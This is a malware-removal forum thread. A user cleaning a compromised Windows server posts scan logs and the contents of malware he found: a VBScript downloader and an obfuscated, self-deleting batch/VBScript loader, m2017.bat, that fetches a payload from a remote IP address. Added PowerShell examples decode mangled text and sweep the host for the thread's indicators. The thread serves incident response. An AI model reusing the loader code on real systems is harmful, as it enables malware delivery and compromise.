AlinTech
Honorary Members
Posts: 28
Reputation: 0 Neutral
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
I'm the only IT specialist. The server is compromised. I back up and export the DBs and I create a new VM. Thank you very much for the support, sir! Thank you for your time! Best regards. -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
PS C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar> .\detect_vollgar.ps1

Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning message. Do you want to run C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar\detect_vollgar.ps1?
[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): r

Vollgar Campaign Detection Tool
Written By Guardicore Labs
Contact us at: labs@guardicore.com

[V] Vollgar's malicious service SQLAGENT MSSQL SQLIOSIMSA was not found on this host.
[V] Vollgar's local user IUER_SERVER was not found on this host.
[V] No malicious payloads were found.
[V] No malicious scheduled tasks were found.
[V] No evidence for the Vollgar campaign has been found on this host.

PS C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar> -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
If you want remote control, tell me and I'll give it to you. Thank you for the support. -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
https://www.virustotal.com/gui/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/detection It's not true, check the community tab. And the file appears to have been scanned on 2020-04-11 21:29:47 UTC. -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Yes, this is the content:

on error resume next
with wscript:if .arguments.count<2 then .quit:end if
set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp")
web.open "get",.arguments(0),0:web.send:if web.status>200 then quit
aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with

----------------------------

I found in C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1048-7B44-AC0F074E4100} these files:
abcpy.ini.id-58D92ED6.[datadecrypt@qq.com].ETH
setup.ini.id-58D92ED6.[datadecrypt@qq.com].ETH

I found in C:\ProgramData\DataFiles\Microsoft\Fonts these files: CSCDA59.tmp, CSCEFB6.tmp, m2017.bat, m2017.exe, up.cs

The content of m2017.bat is:

'&MZ? ? @ ? ???L?This program cannot be run in DOS mode.
cls
:On Error Resume Next'&cd /d "%~dp0" &cscript -e:vbs "%~f0" http://209.135.140.129:8080/www/lnx/fvdl
'&cscript -e:VBScript.Encode "zxx.zip" http://209.135.140.129:8080/www/lnx/fvdl 579562847'&del "zxx.zip"&del "%~f0"&Exit
currentpath = createobject("Scripting.FileSystemObject").GetFile(Wscript.ScriptFullName).ParentFolder.Path
dim x:Set x = createobject(chr(87)+chr(105)+chr(110)+chr(72)+chr(116)+chr(116)+chr(112)+chr(46)+chr(87)+chr(105)+chr(110)+chr(72)+chr(116)+chr(116)+chr(112)+chr(82)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116)+chr(46)+chr(53)+chr(46)+chr(49))
dim b:Set b = createobject(chr(65)+chr(100)+chr(111)+chr(100)+chr(98)+chr(46)+chr(83)+chr(116)+chr(114)+chr(101)+chr(97)+chr(109))
x.Open chr(71)+chr(69)+chr(84),WScript.Arguments(0),0:x.Send
with b:.type = 1:.open:.write x.responseBody:.savetofile currentpath&"\zxx.zip",2:.close:end with

I found in C:\ProgramData\MySQL\MySQL Server 5.5\data\mysql, see the attachment. I didn't find any VBS files. Thank you -
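When a batch or VBScript file such as m2017.bat is opened in an editor that guesses UTF-16, every two ASCII bytes are shown as one CJK-looking character, which is why a pasted copy turns into a wall of such characters. The text is not lost, only mis-decoded, and re-encoding it as UTF-16LE returns the original bytes. The function below is an added example for this thread, not code from the thread or from Guardicore; the sample line is constructed here by applying the same mis-decoding to a known string, and the caveat about dropped characters is my own observation.

```powershell
# Added example, not from the thread: undo the "CJK mojibake" that results when an
# editor decodes an ASCII/ANSI script as UTF-16LE. Every displayed character holds two
# of the original bytes (low byte first), so re-encoding the text as UTF-16LE returns
# the original byte stream.
function ConvertFrom-Utf16Mojibake {
    param([Parameter(Mandatory)][string]$Garbled)

    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Garbled)   # "Unicode" = UTF-16LE in .NET
    $text  = [System.Text.Encoding]::ASCII.GetString($bytes)

    # Sanity check: a genuine ASCII script yields only printable bytes plus TAB/LF/CR.
    # Anything else means the encoding guess was wrong or the file carries binary data
    # (for example the "MZ ... DOS mode" PE stub seen at the top of m2017.bat).
    $bad = @($bytes | Where-Object { $_ -gt 0x7E -or ($_ -lt 0x20 -and $_ -notin 9, 10, 13) }).Count
    [pscustomobject]@{
        Text         = $text
        NonPrintable = $bad
        Note         = if ($bad) { 'non-ASCII bytes present: wrong encoding guess or binary content' } else { 'clean' }
    }
}

# Constructed sample: the mojibake form of one plain line, produced the same way the
# editor produced it (ASCII bytes read as UTF-16LE). A pair such as "e " becomes U+2065,
# an invisible character that clipboard or forum sanitizers may drop; each such drop
# leaves a two-byte hole in the recovered text that has to be filled from context.
$line    = 'On Error Resume Next'
$garbled = [System.Text.Encoding]::Unicode.GetString([System.Text.Encoding]::ASCII.GetBytes($line))
$garbled                                      # the CJK-looking rendering
(ConvertFrom-Utf16Mojibake $garbled).Text     # the original line again
```

To process a pasted copy of a whole file, read it with `Get-Content -Raw` and pass the string to the function; an odd character count or a non-zero `NonPrintable` value is the signal that something was stripped or that the file was never plain text.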
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Sure. usdta.zip -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Thanks. EventLogs.zip -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Question: Is this machine in a business-network or home-network type setting?
A: Business network
Q: Is this same system serving multiple simultaneous users? Or just yourself?
A: Multiple simultaneous users
---------------------------------------------------------
I don't use Internet Explorer, but I know viruses use it to download infected files. Thank you very much for the support. mbar-log-2020-04-11 (22-05-01).txt AdwCleaner[S01].txt Search.txt -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
This is my BGP log with AiProtection - Infected Device Prevention and Blocking: IntrusionPreventionSystem.csv MaliciousSitesBlocking.csv -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
In ProgramData I found this: SQLAGENTVDC.exe, usdta.vbs. In the attachment, I opened it with edit. https://www.virustotal.com/gui/file/656c6324142ebbc7184792130f9299c6e2a0bfc451f2609ca5947d2bcc5cb288/detection New Text Document.txt -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Yes, I have enabled Audit Process Creation and Include command line in process creation events, exactly as in the documentation. -
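With process-creation auditing and command-line logging turned on, Security event 4688 records every process start together with its command line, which is exactly what is needed to spot the `cscript`/`wscript` downloader pattern from the posted VBScript (`microsoft.xmlhttp` plus `adodb.stream`). The script below is an added triage example for this thread, not code from the thread and not Guardicore's detect_vollgar.ps1: it looks for the files, user, service and task artifacts named in the posts above and then sweeps 4688 events for matching command lines. The ProgramData paths and names come from the posts; the `Add-Finding` helper, the seven-day window and the regular expression are my assumptions.

```powershell
# Added triage example, not from this thread and not Guardicore's detect_vollgar.ps1.
# Checks the local host for the artifacts named in the posts and for process-creation
# events (Security 4688 with command line, which the poster enabled) whose command line
# matches the VBScript downloader pattern. Paths are taken from the posts; the 7-day
# window and the regex are assumptions made for this example.
#Requires -RunAsAdministrator
$ErrorActionPreference = 'SilentlyContinue'
$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding([string]$Type, [string]$Detail, [string]$Extra) {
    $findings.Add([pscustomobject]@{ Type = $Type; Detail = $Detail; Extra = $Extra })
}

# 1. Files named in the thread (hashes let you compare against the VirusTotal links)
$iocFiles = @(
    'C:\ProgramData\SQLAGENTVDC.exe',
    'C:\ProgramData\usdta.vbs',
    'C:\ProgramData\DataFiles\Microsoft\Fonts\m2017.bat',
    'C:\ProgramData\DataFiles\Microsoft\Fonts\m2017.exe',
    'C:\ProgramData\DataFiles\Microsoft\Fonts\up.cs'
)
foreach ($p in $iocFiles) {
    if (Test-Path -LiteralPath $p) {
        Add-Finding 'File' $p (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
    }
}

# 2. Ransomware-renamed files, <name>.id-XXXXXXXX.[mail].ETH, as seen under Adobe\Setup
Get-ChildItem -Path 'C:\ProgramData' -Recurse -File -Filter '*.ETH' |
    Where-Object { $_.Name -match '\.id-[0-9A-F]{8}\.\[[^\]]+\]\.ETH$' } |
    ForEach-Object { Add-Finding 'Encrypted' $_.FullName $_.LastWriteTime }

# 3. The local user from the detection tool output, and services whose binary lives
#    under ProgramData (SQLAGENTVDC.exe was found there)
if (Get-LocalUser | Where-Object Name -eq 'IUER_SERVER') { Add-Finding 'LocalUser' 'IUER_SERVER' '' }
Get-CimInstance Win32_Service |
    Where-Object { $_.PathName -match 'ProgramData|SQLAGENTVDC' } |
    ForEach-Object { Add-Finding 'Service' $_.Name $_.PathName }

# 4. Scheduled tasks that launch a script host or anything under ProgramData
Get-ScheduledTask | ForEach-Object {
    $cmd = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' '
    if ($cmd -match 'cscript|wscript|\.vbs|ProgramData') { Add-Finding 'Task' $_.TaskName $cmd }
}

# 5. Process creation (4688) with command lines matching the downloader pattern.
#    The script host's //E: engine switch (written -e: in some loaders) runs a file
#    under a chosen engine regardless of its extension; both spellings are matched.
$pattern = '(?:-|//)e:vb|microsoft\.xmlhttp|adodb\.stream|usdta\.vbs|m2017\.(?:bat|exe)|SQLAGENTVDC'
$since   = (Get-Date).AddDays(-7)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d['CommandLine'] -match $pattern) {
            Add-Finding 'Process' $d['NewProcessName'] ('{0} user={1} parent={2} cmd={3}' -f `
                $_.TimeCreated, $d['SubjectUserName'], $d['ParentProcessName'], $d['CommandLine'])
        }
    }

if ($findings.Count) { $findings | Format-Table -AutoSize -Wrap } else { 'No thread indicators found on this host.' }
```

A clean result from this sweep only says the named artifacts are absent now; on a host that was already compromised it does not prove anything about what else was dropped, which is why the poster's decision to rebuild from a fresh VM after exporting the databases is the right call.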
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Thank you. This is the ESET log. esetlog.txt -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>sfc /scannow

Beginning system scan. This process will take some time.

Beginning verification phase of system scan.
Verification 100% complete.

Windows Resource Protection did not find any integrity violations.

C:\WINDOWS\system32>

Now I start the full scan with ESET Online. Thx -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Hi, thank you, sir. Fixlog.txt